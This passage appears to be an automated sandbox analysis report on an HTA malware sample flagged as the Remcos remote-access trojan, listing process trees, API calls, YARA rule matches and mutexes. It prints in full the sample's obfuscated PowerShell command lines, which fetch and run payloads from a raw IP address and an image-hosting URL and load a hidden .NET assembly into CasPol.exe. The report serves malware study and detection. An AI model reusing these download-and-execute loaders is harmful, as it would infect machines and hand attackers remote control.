ckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

11_2_004158B9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02E487B0	8_2_02E487B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02E47FCD	8_2_02E47FCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_004520E2	11_2_004520E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0041D081	11_2_0041D081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0043D0A8	11_2_0043D0A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00437160	11_2_00437160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_004361BA	11_2_004361BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00426264	11_2_00426264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00431387	11_2_00431387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0041E5EF	11_2_0041E5EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0044C749	11_2_0044C749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_004267DB	11_2_004267DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0043C9ED	11_2_0043C9ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00432A59	11_2_00432A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0043CC1C	11_2_0043CC1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00434D32	11_2_00434D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0043CE4B	11_2_0043CE4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00440E30	11_2_00440E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00426E83	11_2_00426E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00412F45	11_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00452F10	11_2_00452F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00426FBD	11_2_00426FBD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004020E7 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004338B5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00433FC0 appears 55 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2071
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2038
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2071	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2038	Jump to behavior

Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

11_2_00416AB7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

11_2_0040E219

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_0041A64F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_00419BD4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart[1].tiff

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-QEQMVZ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3516:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjzaxl5k.l2g.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nicegirlforyou.hta	ReversingLabs: Detection: 26%
Source: nicegirlforyou.hta	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\nicegirlforyou.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
